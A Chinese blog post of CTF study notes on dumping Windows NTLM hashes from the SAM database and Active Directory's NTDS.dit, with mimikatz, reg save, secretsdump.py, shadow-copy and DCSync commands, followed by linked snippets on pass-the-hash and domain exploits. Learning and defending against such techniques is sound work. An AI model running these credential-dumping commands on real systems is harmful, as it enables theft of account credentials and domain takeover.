内网渗透之获取hash身份凭证

最新推荐文章于 2022-12-07 22:36:15 发布
最新推荐文章于 2022-12-07 22:36:15 发布
阅读量450 收藏
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/114105194
版权

内网渗透之获取hash身份凭证

0 前言

下文主要是从《从0到1的CTFer成长之路》阅读所做的笔记,以备忘总结为目的,归纳角度从原理和方法入手,直观体验是每个标题有两个子标题,分别为原理和方法
上文提到内网渗透之获取明文身份凭证,但有时如果拿不到明文的身份凭证又该怎么办,还有一种hash凭证可以获取。

1 SAM数据库

原理

审核 SAM,它使您能够审核通过尝试访问 SAM 安全帐户管理器或 SAM (生成的) 事件。安全帐户管理器 (SAM) 是运行 Windows 操作系统的计算机上存在的数据库,用于存储本地计算机上用户的用户帐户和安全描述符。SAM存放在注册表中,用户凭证是以NTLM HASH形式保存。上一篇将lsa的截图中sam也出场了。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LCOzinwU-1614255605998)(media/16142420413654/16142425015835.jpg)]

简单科普一下NTLM hash

通常是指Windows系统下Security Account Manager中保存的用户密码hash

该hash的生成方法:

将明文口令转换成十六进制的格式
转换成Unicode格式,即在每个字节之后添加0x00
对Unicode字符串作MD4加密,生成32位的十六进制数字串

方法

(1) 上传mimikatz

privilege::debug
token::elevate
lsadump::sam

(2) 导出sam数据库本地解析

reg save HKLM\sam sam
reg save HKLM\system system

然后用mimikatz提取hash

lsadump::sam /sam:sam /system:system

或者使用
secretsdumps.py

secretsdumps.py -sam sam.save -security security.save -system system.save LOCAL

2 NTDS.dit

原理

中文名称是活动目录数据库,数据存储包含存储和管理用户、服务和应用程序的目录信息的 数据库文件和文件进程。

方法

(1)远程提取
secretsdump

secretsdumps.py -just-dc administrator:P@ssword@192.168.40.130

(2)本地提取
复制NTDS.ditd到本地然后用secretsdump提取

secretsdumps.py -ntds /tmp/ntds.dit - system /tmp//system.hiv LOCAL

其中复制可能会受到限制,治理要用css卷影复制
脚本
https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1

usage:

Copy-VSS -DestinationDir C:\temp

(3)mimikatz
mimikatz通过dcsync特性获取域控的hash,usage

lsadump::dcsync /domain:lzly.lab /all /csv
_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透之Pass-the-hash
ToyCarryYou的博客
04-24 1113
渗透 什么是AD域 AD的全称是Active Directory(活动目录) 是指windows服务器操作系统中的目录服务,它被包含在大多数windows sever操作系统中,负责集中式域管理及身份认证。AD域中是每个Windows域络的基石。他负责存储域成员(包括设备和用户)的信息,验证其凭据并定义访问权限。运行此服务的服务器称为域控制器。AD域架构的常用对象包括以下四种 1.**组织单位...
横向移动密码凭证获取总结.pdf
12-08
转载公众号作为留存记录
渗透-hash窃取
weixin_30402343的博客
05-02 230
转发自 https://www.anquanke.com/post/id/177123 转载于:https://www.cnblogs.com/lieweidu/p/10801763.html
渗透模块之Hash传递
weixin_45007073的博客
01-26 377
前言 我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
渗透获取明文身份凭证
HWHXY的博客
02-25 821
渗透获取明文身份凭证 0 前言 下文主要是从《从0到1的CTFer成长之路》阅读所做的笔记,处于备忘的目的,主要内容是内渗透获取控制主机的明文身份凭证的几种方法,归纳角度从原理和方法两个角度写。。 1 LSA Secret 原理 本地安全策略,存储私有数据,用户和系统的敏感数据都存储在LSA Secrets的注册表中 操作 开始--运行bai--(输入)regedit--回车 Secrets里面存在用户的一些default 方法 先导出注册表项 reg save hklm\sam C:\sa
#资源分享达人# 红蓝对抗之Windows内渗透.zip
08-03
4. **凭证哈希转导**:一旦获取了部分账户的凭证哈希,可以使用工具(如Mimikatz)尝试转导出明文密码,或者通过Pass the Hash或Pass the Ticket技术进行横向移动。 5. **权限提升**:利用权限提升漏洞(如MS14-068...
John the Ripper 获取hash
10-06
John the Ripper 获取hash
渗透之Responder攻防(上)1
08-08
"内渗透之Responder攻防(上)" Responder 是一种欺骗工具,广泛应用于内渗透攻击中。它可以欺骗受害机器,使其发送 NTLM V2 Hash,从而获取受害机器的认证信息。本文将详细介绍 Responder 的原理和使用方式。 ...
javascript实现获取字符串hash
10-24
Hash 可以看作是一个 关联数组,它对每一个值都绑定了一个唯一的键(值并不必须是唯一的), 然而,它不能保证迭代时元素的顺序始终一致。因为 JavaScript 程序语言的特性,每个对象实际上都是一个 hash,下面我们...
海量数据解决思路之Hash算法
01-30
本文将粗略讲述一下Hash算法的概念特性,里边会结合分布式系统负载均衡实例对Hash的一致性做深入探讨。另外,探讨一下Hash算法在海量数据处理方案中的通用性。最后,从源代码出发,具体分析一下Hash算法在MapReduce...
Python实现通过文件路径获取文件hash值的方法
09-21
主要介绍了Python实现通过文件路径获取文件hash值的方法,结合实例形式分析了Python针对文件进行hash运算的实现方法与相关注意事项,需要的朋友可以参考下
SharpSecDump:.Impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口
03-19
夏普转储 impacket的secretsdump.py的远程SAM + LSA秘密转储功能的.Net端口。默认情况下,在当前用户的上下文中运行。请仅在您拥有或有权测试的环境中使用:) 用法 SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local 必需标志 -target-逗号分隔的要扫描的IP /主机名列表。请不要在地址之间包含空格。通过将target设置为127.0.0.1,还可以在本地系统上转储哈希。 可选标志 -u-要使用的用户名,如果要使用备用凭据来运行。必须与-p和-d标志一起使用 -p -明文密码才能使用,如果你想使用备用凭据运行。必须与-u和-d标志一起使用 -d-要使用的域(如果要使用备用凭据运行)(对于本地域)。必须与-u和-p标志一起使用 -threads-用于并发枚举多个
ATT&CK-T1003-002 - 操作系统凭据转储:安全帐户管理器
swordheart的博客
12-07 564
攻击者可能会尝试通过内存技术或通过存储 SAM 数据库的 Windows 注册表从安全帐户管理器 (SAM) 数据库中提取凭证材料。SAM 是一个数据库文件,其中包含主机的本地帐户,通常是使用**** 命令找到的帐户。枚举 SAM 数据库需要 SYSTEM 级别的访问权限。许多工具可用于通过内存技术检索 SAM 文件:或者,可以使用 Reg 从注册表中提取 SAM:然后可以使用 Creddump7 在本地处理 SAM 数据库以检索哈希值。可以通过三个注册表项枚举本地 SAM(SAM 和系统)、缓存凭证(系统
什么是DCSync
sangfor_edu的博客
10-28 684
在域环境中,域控制之间每十五分钟就会进行一次域数据同步。当域控制A需要从域控制器B获取数据时,会向其发送一个 GetNCChanges 请求,该请求包含了需要同步的数据,如果获取的数据较多,则会进行循环请求。DCSync是mimikatz在2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash
渗透攻击技术的利用
kali_Ma的博客
09-14 2180
DCSync 是什么 在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向 DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync 就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口向域控发起数据同步请求。 DCSync 是域渗透中经常会
NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决
热门推荐
Love&Share
09-17 1万+
NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020-1472,漏洞等级:严重,漏洞评分:10分。CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞,攻击者通过NetLogon,建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。 漏洞成因 Netlogon协议身份认证采用了挑战-响应机制,其中加密算法是AES-CFB8,并且
渗透笔记】域内密码凭证获取
白菜猪肉炖粉条
12-28 1666
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
(转)MS14-068域内提权漏洞总结
weixin_30849591的博客
05-07 924
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许...
用户口令审计2
willow_liang的博客
11-30 382
目录 medusa在线密码破解工具 支持多种常见协议(身份认证) gpp-decrypt-域策略审计 crowbar-在线密码破解工具 brutespray在线密码破解工具 polenum-组策略枚举 rsmangler-自定义字典 cachedump_lsadump-Windows认证提取 medusa在线密码破解工具 支持多种常见协议(身份认证) medusa -d #模块列表(支持协议) medusa -M ftp -q #查看模块参数 medu.
Redistemp如何获取hash
最新发布
08-12
Redis 中可以使用 Redis Hash 数据类型来存储和获取 hash 表。使用命令 `HSET` 可以将一个 field-value 对设置到 hash 表中,使用命令 `HGET` 可以获取某一个 field 的值。也可以使用 `HGETALL` 命令获取整个hash表...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值